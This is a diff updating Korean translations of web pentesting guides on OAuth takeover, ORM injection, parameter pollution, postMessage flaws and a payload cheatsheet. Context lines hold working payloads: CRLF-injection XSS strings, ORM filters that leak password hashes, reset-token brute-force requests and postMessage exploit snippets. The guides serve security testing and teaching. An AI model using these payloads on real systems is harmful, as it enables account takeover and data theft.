+[**이 글에 따르면**](https://medium.com/@metnew/why-electron-apps-cant-store-your-secrets-confidentially-inspect-option-a49950d6d51f), 피해자가 **returnUrl**이 공격자의 호스트를 가리키는 페이지를 열도록 만드는 것이 가능했습니다. 이 정보는 **쿠키(RU)**에 **저장되며**, **나중에** **프롬프트**가 **사용자에게** 해당 공격자의 호스트에 대한 접근을 허용할 것인지 **묻습니다**.
 
 이 프롬프트를 우회하기 위해, **returnUrl**을 사용하여 이 RU 쿠키를 설정하는 **Oauth 흐름**을 시작하기 위해 탭을 열고, 프롬프트가 표시되기 전에 탭을 닫고, 해당 값 없이 새 탭을 열 수 있었습니다. 그러면 **프롬프트는 공격자의 호스트에 대해 알리지 않지만**, 쿠키는 해당 호스트로 설정되므로 **토큰은 리디렉션에서 공격자의 호스트로 전송됩니다**.
 
@@ -168,7 +168,7 @@ AWS Cognito를 악용하는 방법에 대한 자세한 정보는 다음을 확
 
 ### response_mode
 
-[**이 비디오에서 설명된 바와 같이**](https://www.youtube.com/watch?v=n9x7_J_a_7Q), 최종 URL에서 코드를 제공할 위치를 지정하기 위해 **`response_mode`** 매개변수를 지정할 수 있습니다:
+[**이 비디오에서 설명된 바와 같이**](https://www.youtube.com/watch?v=n9x7_J_a_7Q), 최종 URL에서 코드를 제공할 위치를 지정하기 위해 **`response_mode`** 매개변수를 지정하는 것이 가능할 수 있습니다:
 
 - `response_mode=query` -> 코드는 GET 매개변수 내에 제공됩니다: `?code=2397rf3gu93f`
 - `response_mode=fragment` -> 코드는 URL 조각 매개변수 내에 제공됩니다: `#code=2397rf3gu93f`
@@ -181,12 +181,12 @@ AWS Cognito를 악용하는 방법에 대한 자세한 정보는 다음을 확
 
 ### 오픈 리디렉션을 기반으로 한 웹 페이지 리디렉션에서 ATO <a href="#bda5" id="bda5"></a>
 
-이 [**블로그 게시물**](https://blog.voorivex.team/oauth-non-happy-path-to-ato)은 **오픈 리디렉션**을 사용하여 **리퍼러**의 값을 악용하여 OAuth를 ATO로 악용할 수 있었던 방법을 설명합니다. 공격은 다음과 같았습니다:
+이 [**블로그 게시물**](https://blog.voorivex.team/oauth-non-happy-path-to-ato)은 **리퍼러**의 값을 사용하여 **오픈 리디렉션**을 악용하여 OAuth를 ATO로 악용하는 방법을 설명합니다. 공격은 다음과 같았습니다:
 
 1. 피해자가 공격자의 웹 페이지에 접근합니다.
 2. 피해자가 악성 링크를 열고, 오프너가 `response_type=id_token,code&prompt=none`을 추가 매개변수로 사용하여 Google OAuth 흐름을 시작합니다. **리퍼러는 공격자의 웹사이트**입니다.
 3. 오프너에서 제공자가 피해자를 승인한 후, `redirect_uri` 매개변수의 값(피해자 웹)으로 30X 코드와 함께 다시 보냅니다. 이때 여전히 공격자의 웹사이트가 리퍼러에 남아 있습니다.
-4. 피해자 **웹사이트는 리퍼러를 기반으로 오픈 리디렉션을 트리거하여** 피해자 사용자를 공격자의 웹사이트로 리디렉션합니다. **`response_type`**이 **`id_token,code`**였기 때문에, 코드는 URL의 **조각**으로 공격자에게 다시 전송되어 피해자의 사이트에서 Google을 통해 사용자의 계정을 탈취할 수 있게 됩니다.
+4. 피해자 **웹사이트는 리퍼러를 기반으로 오픈 리디렉션을 트리거하여** 피해자 사용자를 공격자의 웹사이트로 리디렉션합니다. **`respose_type`**이 **`id_token,code`**였기 때문에, 코드는 URL의 **조각**으로 공격자에게 다시 전송되어 피해자의 사이트에서 Google을 통해 사용자의 계정을 탈취할 수 있게 됩니다.
 
 ### SSRF 매개변수 <a href="#bda5" id="bda5"></a>
 
@@ -211,7 +211,7 @@ OAuth의 동적 클라이언트 등록은 보안 취약점, 특히 **서버 측
 
 ## OAuth 제공자의 경쟁 조건
 
-테스트 중인 플랫폼이 OAuth 제공자인 경우 [**경쟁 조건을 테스트하기 위해 이 내용을 읽어보세요**](race-condition.md).
+테스트 중인 플랫폼이 OAuth 제공자인 경우 [**경쟁 조건을 테스트하기 위해 이 내용을 읽으세요**](race-condition.md).
 
 ## 참고 문헌
 
diff --git a/src/pentesting-web/orm-injection.md b/src/pentesting-web/orm-injection.md
index 6b66102c1..06679d115 100644
--- a/src/pentesting-web/orm-injection.md
+++ b/src/pentesting-web/orm-injection.md
@@ -4,11 +4,11 @@
 
 ## Django ORM (Python)
 
-In [**this post**](https://www.elttam.com/blog/plormbing-your-django-orm/)는 Django ORM을 취약하게 만드는 방법을 설명합니다. 예를 들어 다음과 같은 코드를 사용하여:
+In [**this post**](https://www.elttam.com/blog/plormbing-your-django-orm/)는 Django ORM을 취약하게 만드는 방법을 설명합니다. 예를 들어 다음과 같은 코드를 사용할 수 있습니다:
 
 <pre class="language-python"><code class="lang-python">class ArticleView(APIView):
 """
-사용자가 기사 검색을 위해 요청을 보내는 기본 API 뷰
+사용자가 기사를 검색하기 위해 요청을 보내는 기본 API 뷰
 """
 def post(self, request: Request, format=None):
 try:
@@ -19,7 +19,7 @@ return Response([])
 return Response(serializer.data)
 </code></pre>
 
-모든 request.data(이는 json이 될 것입니다)가 **데이터베이스에서 객체를 필터링하는 데** 직접 전달되는 방식을 주목하십시오. 공격자는 예상보다 더 많은 데이터를 유출하기 위해 예상치 못한 필터를 보낼 수 있습니다.
+모든 request.data(이는 json이 될 것입니다)가 **데이터베이스에서 객체를 필터링하는 데** 직접 전달되는 방식을 주목하세요. 공격자는 예상보다 더 많은 데이터를 유출하기 위해 예상치 못한 필터를 보낼 수 있습니다.
 
 예시:
 
@@ -49,7 +49,7 @@ return Response(serializer.data)
 }
 ```
 > [!CAUTION]
-> 이 경우, 우리는 기사를 작성한 사용자 부서의 모든 사용자를 찾고 그들의 비밀번호를 유출할 수 있습니다 (이전 json에서는 사용자 이름만 유출하고 있지만, 이후에는 비밀번호를 유출할 수 있습니다).
+> 이 경우, 우리는 기사를 작성한 사용자들이 있는 부서의 모든 사용자를 찾고 그들의 비밀번호를 유출할 수 있습니다 (이전 json에서는 사용자 이름만 유출하고 있지만, 이후에는 비밀번호를 유출할 수 있습니다).
 
 - **Django 그룹 및 권한의 다대다 관계를 사용자와 악용하기**: 게다가, AbstractUser 모델은 Django에서 사용자를 생성하는 데 사용되며 기본적으로 이 모델은 **Permission 및 Group 테이블과의 다대다 관계**를 가지고 있습니다. 이는 기본적으로 **같은 그룹에 있거나 동일한 권한을 공유하는 경우 한 사용자에서 다른 사용자에 접근하는 방법**입니다.
 ```bash
@@ -59,14 +59,14 @@ created_by__user__groups__user__password
 # By users with the same permission
 created_by__user__user_permissions__user__password
 ```
-- **필터 제한 우회**: 동일한 블로그 게시물은 `articles = Article.objects.filter(is_secret=False, **request.data)`와 같은 일부 필터링을 우회할 것을 제안했습니다. is_secret=True인 기사를 덤프하는 것이 가능하며, 관계에서 Article 테이블로 다시 루프를 돌 수 있기 때문에 비밀 기사를 비밀이 아닌 기사에서 유출할 수 있습니다. 결과는 조인되고 is_secret 필드는 비밀이 아닌 기사에서 확인되며 데이터는 비밀 기사에서 유출됩니다.
+- **필터 제한 우회**: 동일한 블로그 게시물은 `articles = Article.objects.filter(is_secret=False, **request.data)`와 같은 일부 필터링을 우회할 것을 제안했습니다. is_secret=True인 기사를 덤프하는 것이 가능하며, 관계에서 Article 테이블로 다시 루프를 돌 수 있기 때문에 비밀 기사를 비밀이 아닌 기사에서 유출할 수 있습니다. 결과가 조인되고 is_secret 필드가 비밀이 아닌 기사에서 확인되는 동안 비밀 기사에서 데이터가 유출됩니다.
 ```bash
 Article.objects.filter(is_secret=False, categories__articles__id=2)
 ```
 > [!CAUTION]
 > 관계를 악용하면 표시된 데이터를 보호하기 위한 필터를 우회할 수 있습니다.
 
-- **오류/시간 기반 ReDoS**: 이전 예제에서는 필터링이 작동하는지 여부에 따라 다른 응답을 기대했으며 이를 오라클로 사용했습니다. 그러나 데이터베이스에서 어떤 작업이 수행되고 응답이 항상 동일할 수 있습니다. 이 시나리오에서는 데이터베이스 오류를 발생시켜 새로운 오라클을 얻을 수 있습니다.
+- **오류/시간 기반 ReDoS**: 이전 예제에서는 필터링이 작동하는지 여부에 따라 다른 응답을 기대했으며, 이를 오라클로 사용했습니다. 그러나 데이터베이스에서 어떤 작업이 수행되고 응답이 항상 동일할 수 있습니다. 이 시나리오에서는 데이터베이스 오류를 발생시켜 새로운 오라클을 얻을 수 있습니다.
 ```json
 // Non matching password
 {
@@ -92,7 +92,7 @@ app.use(express.json());
 
 app.post('/articles/verybad', async (req, res) => {
 try {
-// Attacker has full control of all prisma options
+// 공격자는 모든 prisma 옵션에 대한 전체 제어를 가집니다
 <strong>        const posts = await prisma.article.findMany(req.body.filter)
 </strong>        res.json(posts);
 } catch (error) {
@@ -283,7 +283,7 @@ def index
 @posts = @q.result(distinct: true)
 end
 ```
-공격자가 보낸 매개변수에 의해 쿼리가 정의된다는 점에 유의하십시오. 예를 들어, 다음과 같이 재설정 토큰을 무차별 대입할 수 있었습니다:
+공격자가 보낸 매개변수에 의해 쿼리가 정의된다는 점에 유의하십시오. 예를 들어, 다음과 같이 리셋 토큰을 무차별 대입할 수 있었습니다:
 ```http
 GET /posts?q[user_reset_password_token_start]=0
 GET /posts?q[user_reset_password_token_start]=1
diff --git a/src/pentesting-web/parameter-pollution.md b/src/pentesting-web/parameter-pollution.md
index 558cddd28..3fb20be77 100644
--- a/src/pentesting-web/parameter-pollution.md
+++ b/src/pentesting-web/parameter-pollution.md
@@ -7,7 +7,7 @@
 
 ## HTTP Parameter Pollution (HPP) 개요
 
-HTTP Parameter Pollution (HPP)는 공격자가 HTTP 매개변수를 조작하여 웹 애플리케이션의 동작을 의도하지 않은 방식으로 변경하는 기술입니다. 이 조작은 HTTP 매개변수를 추가, 수정 또는 복제하여 수행됩니다. 이러한 조작의 효과는 사용자에게 직접적으로 보이지 않지만, 서버 측에서 애플리케이션의 기능을 상당히 변경할 수 있으며, 클라이언트 측에서 관찰 가능한 영향을 미칠 수 있습니다.
+HTTP Parameter Pollution (HPP)는 공격자가 HTTP 매개변수를 조작하여 웹 애플리케이션의 동작을 의도하지 않은 방식으로 변경하는 기술입니다. 이 조작은 HTTP 매개변수를 추가, 수정 또는 복제함으로써 이루어집니다. 이러한 조작의 효과는 사용자에게 직접적으로 보이지 않지만, 서버 측에서 애플리케이션의 기능을 상당히 변경할 수 있으며, 클라이언트 측에서 관찰 가능한 영향을 미칠 수 있습니다.
 
 ### HTTP Parameter Pollution (HPP) 예시
 
@@ -19,7 +19,7 @@ HTTP Parameter Pollution (HPP)는 공격자가 HTTP 매개변수를 조작하여
 
 - **조작된 URL:** `https://www.victim.com/send/?from=accountA&to=accountB&amount=10000&from=accountC`
 
-거래가 `accountA` 대신 `accountC`에 잘못 청구될 수 있으며, 이는 HPP가 거래 또는 비밀번호 재설정, 2FA 설정, API 키 요청과 같은 다른 기능을 조작할 수 있는 잠재력을 보여줍니다.
+거래가 `accountA` 대신 `accountC`에 잘못 청구될 수 있으며, 이는 HPP가 거래 또는 비밀번호 재설정, 2FA 설정, API 키 요청과 같은 다른 기능을 조작할 수 있는 가능성을 보여줍니다.
 
 #### **기술별 매개변수 파싱**
 
@@ -50,7 +50,7 @@ HTTP Parameter Pollution (HPP)는 공격자가 HTTP 매개변수를 조작하여
 웹 기술이 중복 HTTP 매개변수를 처리하는 방식은 다르며, HPP 공격에 대한 취약성에 영향을 미칩니다:
 
 - **Flask:** 쿼리 문자열 `a=1&a=2`에서 `a=1`과 같은 첫 번째 매개변수 값을 채택하며, 초기 인스턴스를 후속 중복보다 우선시합니다.
-- **PHP (Apache HTTP Server에서):** 반대로, 마지막 매개변수 값을 우선시하여 주어진 예에서 `a=2`를 선택합니다. 이 동작은 공격자가 조작한 매개변수를 원본보다 우선시함으로써 HPP 악용을 우연히 촉진할 수 있습니다.
+- **PHP (Apache HTTP Server에서):** 반대로, 마지막 매개변수 값을 우선시하여 주어진 예에서 `a=2`를 선택합니다. 이 동작은 공격자가 조작한 매개변수를 원본보다 우선시함으로써 HPP 악용을 무심코 촉진할 수 있습니다.
 
 ## 기술별 매개변수 오염
 
@@ -124,7 +124,7 @@ HTTP Parameter Pollution (HPP)는 공격자가 HTTP 매개변수를 조작하여
 ```ini
 obj = {"test": "user", "test": "admin"}
 ```
-프론트엔드는 첫 번째 발생을 믿을 수 있지만 백엔드는 두 번째 발생을 사용할 수 있습니다.
+프론트엔드는 첫 번째 발생을 믿을 수 있지만 백엔드는 두 번째 발생의 키를 사용할 수 있습니다.
 
 ### 키 충돌: 문자 잘림 및 주석
 
@@ -156,7 +156,7 @@ Serializer 1 (예: GoLang의 GoJay 라이브러리)은 다음을 생성합니다
 - `test = 2`
 - `extra = ""`
 
-Serializer 2 (예: Java의 JSON-iterator 라이브러리)은 다음을 생성합니다:
+Serializer 2 (예: Java의 JSON-iterator 라이브러리)는 다음을 생성합니다:
 
 - `description = "Duplicate with comments"`
 - `extra = "/*"`
@@ -196,7 +196,7 @@ obj.toString() // {"test": 2}
 0
 9223372036854775807
 ```
-어떤 것이 불일치를 초래할 수 있습니다
+어떤 불일치를 초래할 수 있습니다
 
 ## References
 
diff --git a/src/pentesting-web/pocs-and-polygloths-cheatsheet/README.md b/src/pentesting-web/pocs-and-polygloths-cheatsheet/README.md
index 2d3c879de..5da492c24 100644
--- a/src/pentesting-web/pocs-and-polygloths-cheatsheet/README.md
+++ b/src/pentesting-web/pocs-and-polygloths-cheatsheet/README.md
@@ -5,10 +5,10 @@
 이 PoCs와 Polygloths의 목표는 테스터에게 **응답에 입력이 반영되는 경우** 그가 악용할 수 있는 취약점에 대한 빠른 **요약**을 제공하는 것입니다.
 
 > [!WARNING]
-> 이 **cheatsheet는 각 취약점에 대한 포괄적인 테스트 목록을 제안하지 않습니다**, 기본적인 것들만 포함되어 있습니다. 더 포괄적인 테스트를 원하신다면 제안된 각 취약점에 접근하세요.
+> 이 **치트시트는 각 취약점에 대한 포괄적인 테스트 목록을 제안하지 않습니다**, 기본적인 것들만 포함되어 있습니다. 더 포괄적인 테스트를 원하신다면 제안된 각 취약점에 접근하세요.
 
 > [!CAUTION]
-> **XXE와 같은 Content-Type 의존적 주입**은 찾을 수 없으며, 일반적으로 xml 데이터를 전송하는 요청을 발견하면 직접 시도할 것입니다. **여기에서 데이터베이스 주입**도 찾을 수 없으며, 일부 콘텐츠가 반영될 수 있지만 이는 백엔드 DB 기술 및 구조에 크게 의존합니다.
+> **XXE와 같은 Content-Type 의존 주입**은 찾을 수 없습니다. 일반적으로 xml 데이터를 전송하는 요청을 발견하면 직접 시도할 것입니다. **여기에서 데이터베이스 주입**도 찾을 수 없습니다. 일부 콘텐츠가 반영될 수 있지만 이는 백엔드 DB 기술 및 구조에 크게 의존합니다.
 
 ## Polygloths list
 ```python
@@ -88,7 +88,7 @@ $(ls)
 %3f%0D%0ALocation://x:1%0D%0AContent-Type:text/html%0D%0AX-XSS-Protection%3a0%0D%0A%0D%0A%3Cscript%3Ealert(document.domain)%3C/script%3E
 %0d%0aContent-Length:%200%0d%0a%0d%0aHTTP/1.1%20200%20OK%0d%0aContent-Type:%20text/html%0d%0aContent-Length:%2025%0d%0a%0d%0a%3Cscript%3Ealert(1)%3C/script%3E
 ```
-## 덩글링 마크업
+## 남은 마크업
 
 ### 기본 테스트
 ```markup
diff --git a/src/pentesting-web/postmessage-vulnerabilities/README.md b/src/pentesting-web/postmessage-vulnerabilities/README.md
index 92df5ad52..542698579 100644
--- a/src/pentesting-web/postmessage-vulnerabilities/README.md
+++ b/src/pentesting-web/postmessage-vulnerabilities/README.md
@@ -38,8 +38,8 @@ win[0].postMessage('{"__proto__":{"isAdmin":True}}', '*')
 
 ### iframe 공격 및 **targetOrigin**의 와일드카드
 
-[**이 보고서**](https://blog.geekycat.in/google-vrp-hijacking-your-screenshots/)에서 설명한 바와 같이, **iframed**(X-Frame-Header 보호 없음)될 수 있는 페이지를 찾고 **와일드카드**(\*)를 사용하여 **postMessage**를 통해 **민감한** 메시지를 **전송하는** 경우, **iframe**의 **origin**을 **수정**하고 **민감한** 메시지를 당신이 제어하는 도메인으로 **유출**할 수 있습니다.\
-페이지가 iframed될 수 있지만 **targetOrigin**이 **와일드카드가 아닌 URL로 설정된 경우**, 이 **트릭은 작동하지 않습니다**.
+[**이 보고서**](https://blog.geekycat.in/google-vrp-hijacking-your-screenshots/)에서 설명한 바와 같이, **iframed**(X-Frame-Header 보호가 없음)될 수 있는 페이지를 찾고 **와일드카드**(\*)를 사용하여 **postMessage**를 통해 **민감한** 메시지를 **전송하는** 경우, **iframe**의 **출처**를 **수정**하고 **민감한** 메시지를 당신이 제어하는 도메인으로 **유출**할 수 있습니다.\
+페이지가 iframed될 수 있지만 **targetOrigin**이 **URL로 설정되고 와일드카드가 아닌 경우**, 이 **트릭은 작동하지 않습니다**.
 ```markup
 <html>
 <iframe src="https://docs.google.com/document/ID" />
@@ -69,7 +69,7 @@ if (event.origin !== "http://example.org:8080") return
 false
 )
 ```
-코드가 **가장 먼저** 하는 일이 **출처를 확인하는 것**이라는 점에 유의하세요. 이는 수신된 정보로 **민감한 작업**을 수행할 경우 매우 **중요**합니다 (예: 비밀번호 변경). **출처를 확인하지 않으면 공격자가 피해자가 이 엔드포인트로 임의의 데이터를 전송하게 할 수 있으며** 피해자의 비밀번호를 변경할 수 있습니다 (이 예제에서).
+코드가 **가장 먼저** 하는 일이 **출처를 확인하는 것**이라는 점에 유의하세요. 이는 수신된 정보로 **민감한 작업**(예: 비밀번호 변경)을 수행할 경우 매우 **중요**합니다. **출처를 확인하지 않으면 공격자가 피해자가 이 엔드포인트로 임의의 데이터를 전송하게 할 수** 있으며, 피해자의 비밀번호를 변경할 수 있습니다(이 예제에서).
 
 ### 열거
 
@@ -88,21 +88,21 @@ false
 
 ### 출처 확인 우회
 
-- **`event.isTrusted`** 속성은 진정한 사용자 행동에 의해 생성된 이벤트에 대해서만 `True`를 반환하므로 안전하다고 간주됩니다. 올바르게 구현되면 우회하기 어려우나, 보안 검사에서의 중요성은 주목할 만합니다.
-- PostMessage 이벤트에서 출처 검증을 위해 **`indexOf()`**를 사용하는 것은 우회에 취약할 수 있습니다. 이 취약성을 설명하는 예는 다음과 같습니다:
+- **`event.isTrusted`** 속성은 진정한 사용자 작업에 의해 생성된 이벤트에 대해서만 `True`를 반환하므로 안전하다고 간주됩니다. 올바르게 구현되면 우회하기 어려우나, 보안 검사에서의 중요성은 주목할 만합니다.
+- PostMessage 이벤트에서 출처 유효성 검사를 위해 **`indexOf()`**를 사용하는 것은 우회에 취약할 수 있습니다. 이 취약성을 설명하는 예는 다음과 같습니다:
 
 ```javascript
 "https://app-sj17.marketo.com".indexOf("https://app-sj17.ma")
 ```
 
-- `String.prototype.search()`의 **`search()`** 메서드는 문자열이 아닌 정규 표현식을 위해 설계되었습니다. 정규 표현식이 아닌 것을 전달하면 암묵적으로 정규 표현식으로 변환되어 메서드가 잠재적으로 안전하지 않게 됩니다. 이는 정규 표현식에서 점(.)이 와일드카드로 작용하여 특별히 조작된 도메인으로 검증을 우회할 수 있게 합니다. 예를 들어:
+- `String.prototype.search()`의 **`search()`** 메서드는 문자열이 아닌 정규 표현식을 위해 설계되었습니다. 정규 표현식이 아닌 것을 전달하면 암묵적으로 정규 표현식으로 변환되어 메서드가 잠재적으로 안전하지 않게 됩니다. 이는 정규 표현식에서 점(.)이 와일드카드로 작용하여 특별히 제작된 도메인으로 유효성 검사를 우회할 수 있게 합니다. 예를 들어:
 
 ```javascript
 "https://www.safedomain.com".search("www.s.fedomain.com")
 ```
 
 - `search()`와 유사한 **`match()`** 함수는 정규 표현식을 처리합니다. 정규 표현식이 잘못 구성되면 우회에 취약할 수 있습니다.
-- **`escapeHtml`** 함수는 문자를 이스케이프하여 입력을 정리하는 데 사용됩니다. 그러나 새로운 이스케이프된 객체를 생성하지 않고 기존 객체의 속성을 덮어씁니다. 이 동작은 악용될 수 있습니다. 특히, 객체를 조작하여 그 제어 속성이 `hasOwnProperty`를 인식하지 못하게 할 수 있다면, `escapeHtml`은 예상대로 작동하지 않습니다. 이는 아래 예제에서 보여집니다:
+- **`escapeHtml`** 함수는 문자를 이스케이프하여 입력을 정리하는 데 사용됩니다. 그러나 새로운 이스케이프된 객체를 생성하지 않고 기존 객체의 속성을 덮어씁니다. 이 동작은 악용될 수 있습니다. 특히, 객체를 조작하여 그 제어 속성이 `hasOwnProperty`를 인식하지 못하게 할 수 있다면, `escapeHtml`은 예상대로 작동하지 않을 것입니다. 이는 아래 예제에서 보여집니다:
 
 - 예상 실패:
 
@@ -126,13 +126,13 @@ result.message // "'"<b>\"
 
 ### e.origin == window.origin 우회
 
-**샌드박스 iframe** 내에 웹 페이지를 삽입할 때 %%%%%%를 사용하는 경우, iframe의 출처가 null로 설정된다는 점을 이해하는 것이 중요합니다. 이는 **샌드박스 속성** 및 보안과 기능에 대한 그 의미를 다룰 때 특히 중요합니다.
+**샌드박스 iframe** 내에 웹 페이지를 삽입할 때 %%%%%%를 사용하여 iframe의 출처가 null로 설정된다는 점을 이해하는 것이 중요합니다. 이는 **샌드박스 속성** 및 보안과 기능에 대한 그 의미를 다룰 때 특히 중요합니다.
 
-샌드박스 속성에 **`allow-popups`**를 지정하면 iframe 내에서 열리는 모든 팝업 창은 부모의 샌드박스 제한을 상속받습니다. 이는 **`allow-popups-to-escape-sandbox`** 속성이 포함되지 않는 한, 팝업 창의 출처도 `null`로 설정되어 iframe의 출처와 일치함을 의미합니다.
+샌드박스 속성에 **`allow-popups`**를 지정하면 iframe 내에서 열리는 모든 팝업 창은 부모의 샌드박스 제한을 상속받습니다. 이는 **`allow-popups-to-escape-sandbox`** 속성이 포함되지 않는 한 팝업 창의 출처도 `null`로 설정된다는 것을 의미하며, iframe의 출처와 일치합니다.
 
-따라서 이러한 조건에서 팝업이 열리고 iframe에서 팝업으로 메시지가 **`postMessage`**를 사용하여 전송되면, 송신 및 수신 양쪽의 출처가 `null`로 설정됩니다. 이 상황은 **`e.origin == window.origin`**이 true로 평가되는 시나리오를 초래합니다 (`null == null`), 왜냐하면 iframe과 팝업이 모두 `null`이라는 동일한 출처 값을 공유하기 때문입니다.
+따라서 이러한 조건에서 팝업이 열리고 iframe에서 팝업으로 **`postMessage`**를 사용하여 메시지를 보낼 때, 송신 및 수신 양쪽의 출처가 `null`로 설정됩니다. 이 상황은 **`e.origin == window.origin`**이 true로 평가되는 시나리오를 초래합니다 (`null == null`), 왜냐하면 iframe과 팝업이 동일한 출처 값인 `null`을 공유하기 때문입니다.
 
-자세한 정보는 **읽어보세요**:
+자세한 내용은 **읽어보세요**:
 
 {{#ref}}
 bypassing-sop-with-iframes-1.md
@@ -140,7 +140,7 @@ bypassing-sop-with-iframes-1.md
 
 ### e.source 우회
 
-메시지가 스크립트가 청취하고 있는 동일한 창에서 온 것인지 확인할 수 있습니다 (특히 **브라우저 확장에서의 콘텐츠 스크립트**가 메시지가 동일한 페이지에서 전송되었는지 확인하는 데 흥미롭습니다):
+메시지가 스크립트가 청취하고 있는 동일한 창에서 온 것인지 확인할 수 있습니다(특히 **브라우저 확장 프로그램의 콘텐츠 스크립트**가 메시지가 동일한 페이지에서 전송되었는지 확인하는 데 흥미롭습니다):
 ```javascript
 // If it’s not, return immediately.
 if (received_message.source !== window) {
@@ -149,7 +149,7 @@ return
 ```
 메시지의 **`e.source`**를 null로 만들기 위해 **postMessage**를 **전송**하고 **즉시 삭제되는** **iframe**을 생성할 수 있습니다.
 
-자세한 정보는 **읽어보세요:**
+자세한 내용은 **읽어보세요:**
 
 {{#ref}}
 bypassing-sop-with-iframes-2.md
@@ -157,17 +157,17 @@ bypassing-sop-with-iframes-2.md
 
 ### X-Frame-Header 우회
 
-이러한 공격을 수행하기 위해 이상적으로는 **피해자 웹 페이지**를 `iframe` 안에 넣을 수 있어야 합니다. 그러나 `X-Frame-Header`와 같은 일부 헤더는 그러한 **동작**을 **방지**할 수 있습니다.\
-이러한 시나리오에서는 덜 은밀한 공격을 여전히 사용할 수 있습니다. 취약한 웹 애플리케이션에 새 탭을 열고 그와 통신할 수 있습니다:
+이러한 공격을 수행하기 위해 이상적으로는 **피해자 웹 페이지**를 `iframe` 안에 넣을 수 있어야 합니다. 그러나 `X-Frame-Header`와 같은 일부 헤더는 그 **동작**을 **방지**할 수 있습니다.\
+이러한 시나리오에서는 덜 은밀한 공격을 여전히 사용할 수 있습니다. 취약한 웹 애플리케이션을 새 탭에서 열고 그와 통신할 수 있습니다:
 ```markup
 <script>
 var w=window.open("<url>")
 setTimeout(function(){w.postMessage('text here','*');}, 2000);
 </script>
 ```
-### 자식에게 전송된 메시지를 메인 페이지 차단으로 훔치기
+### 자식에게 전송된 메시지 훔치기: 메인 페이지 차단
 
-다음 페이지에서는 **메인** 페이지를 차단한 후 **자식 iframe**에 전송된 **민감한 postmessage 데이터**를 어떻게 훔칠 수 있는지 보여줍니다. **자식**에서 **XSS**를 악용하여 데이터가 수신되기 전에 **데이터를 유출**합니다:
+다음 페이지에서는 **메인** 페이지를 차단한 후 **자식 iframe**에 전송된 **민감한 postmessage 데이터**를 어떻게 훔칠 수 있는지 보여줍니다. **자식**에서 **XSS**를 악용하여 데이터가 수신되기 전에 **데이터를 유출**하는 방법입니다:
 
 {{#ref}}
 blocking-main-page-to-steal-postmessage.md
@@ -183,11 +183,11 @@ steal-postmessage-modifying-iframe-location.md
 
 ### postMessage를 통한 프로토타입 오염 및/또는 XSS
 
-`postMessage`를 통해 전송된 데이터가 JS에 의해 실행되는 시나리오에서는, **페이지를 iframe**으로 삽입하고 **프로토타입 오염/XSS**를 **postMessage**를 통해 악용할 수 있습니다.
+`postMessage`를 통해 전송된 데이터가 JS에 의해 실행되는 시나리오에서는, **페이지**를 **iframe**으로 삽입하고 **프로토타입 오염/XSS**를 **악용**하여 `postMessage`를 통해 익스플로잇을 전송할 수 있습니다.
 
 [https://jlajara.gitlab.io/web/2020/07/17/Dom_XSS_PostMessage_2.html](https://jlajara.gitlab.io/web/2020/07/17/Dom_XSS_PostMessage_2.html)에서 **postMessage**를 통한 **XSS**에 대한 **매우 잘 설명된** 사례를 찾을 수 있습니다.
 
-`iframe`으로의 `postMessage`를 통한 **프로토타입 오염 및 XSS**를 악용하는 예:
+`iframe`으로의 `postMessage`를 통한 **프로토타입 오염 및 XSS**를 악용하는 익스플로잇의 예:
 ```html
 <html>
 <body>
@@ -218,7 +218,7 @@ setTimeout(get_code, 2000)
 - [**XSS**](../xss-cross-site-scripting/)에 대한 페이지 링크
 - [**클라이언트 측 프로토타입 오염에서 XSS로**](../deserialization/nodejs-proto-prototype-pollution/#client-side-prototype-pollution-to-xss)에 대한 페이지 링크
 
-## 참고 문헌
+## 참고문헌
 
 - [https://jlajara.gitlab.io/web/2020/07/17/Dom_XSS_PostMessage_2.html](https://jlajara.gitlab.io/web/2020/07/17/Dom_XSS_PostMessage_2.html)
 - [https://dev.to/karanbamal/how-to-spot-and-exploit-postmessage-vulnerablities-36cd](https://dev.to/karanbamal/how-to-spot-and-exploit-postmessage-vulnerablities-36cd)
diff --git a/src/pentesting-web/postmessage-vulnerabilities/blocking-main-page-to-steal-postmessage.md b/src/pentesting-web/postmessage-vulnerabilities/blocking-main-page-to-steal-postmessage.md
index 4e53a8b85..e35bce174 100644
--- a/src/pentesting-web/postmessage-vulnerabilities/blocking-main-page-to-steal-postmessage.md
+++ b/src/pentesting-web/postmessage-vulnerabilities/blocking-main-page-to-steal-postmessage.md
@@ -12,7 +12,7 @@
 따라서 공격자의 목표는 **부모가 iframe을 생성하게** 하되, **부모** 페이지가 **민감한 데이터(플래그)**를 **전송하기 전에** **바쁘게 유지**하고 **payload를 iframe으로 전송**하는 것입니다. **부모가 바쁠 때** **iframe은 payload를 실행**하며, 이는 **부모 postmessage 메시지를 듣고 플래그를 유출하는** JS가 될 것입니다.\
 마지막으로, iframe은 payload를 실행하고 부모 페이지는 바쁘지 않게 되므로 플래그를 전송하고 payload가 이를 유출합니다.
 
-그렇다면 부모가 **iframe을 생성한 직후에 민감한 데이터를 전송하기 위해 iframe이 준비되기를 기다리는 동안 어떻게 바쁘게 만들 수 있을까요?** 기본적으로 부모가 **실행할 수 있는** **비동기** **작업**을 찾아야 합니다. 예를 들어, 이 도전에서 부모는 다음과 같이 **postmessages**를 **듣고** 있었습니다:
+그렇다면 부모가 **iframe을 생성한 직후에 민감한 데이터를 전송하기 위해 iframe이 준비되기를 기다리는 동안 어떻게 바쁘게 만들 수 있을까요?** 기본적으로 부모가 **실행**할 수 있는 **비동기** **작업**을 찾아야 합니다. 예를 들어, 이 도전에서 부모는 다음과 같이 **postmessages**를 **듣고** 있었습니다:
 ```javascript
 window.addEventListener("message", (e) => {
 if (e.data == "blob loaded") {
@@ -25,6 +25,6 @@ $("#previewModal").modal()
 const buffer = new Uint8Array(1e7);
 win?.postMessage(buffer, '*', [buffer.buffer]);
 ```
-정확하게 **전송**하고 **postmessage**를 **iframe**이 생성된 **후**이지만 부모로부터 데이터를 받을 준비가 **되기 전**에 하려면, **`setTimeout`의 밀리초를 조정**해야 합니다.
+정확하게 **전송**하고 **postmessage**를 **iframe**이 생성된 **후**에, 그러나 부모로부터 데이터를 받을 준비가 **되기 전**에 하려면, **`setTimeout`의 밀리초를 조정**해야 합니다.
 
 {{#include ../../banners/hacktricks-training.md}}
diff --git a/src/pentesting-web/postmessage-vulnerabilities/bypassing-sop-with-iframes-1.md b/src/pentesting-web/postmessage-vulnerabilities/bypassing-sop-with-iframes-1.md
index cdf9609d8..57ac5440d 100644
--- a/src/pentesting-web/postmessage-vulnerabilities/bypassing-sop-with-iframes-1.md
+++ b/src/pentesting-web/postmessage-vulnerabilities/bypassing-sop-with-iframes-1.md
@@ -15,25 +15,25 @@ renderContainer.innerHTML = data.body
 }
 }
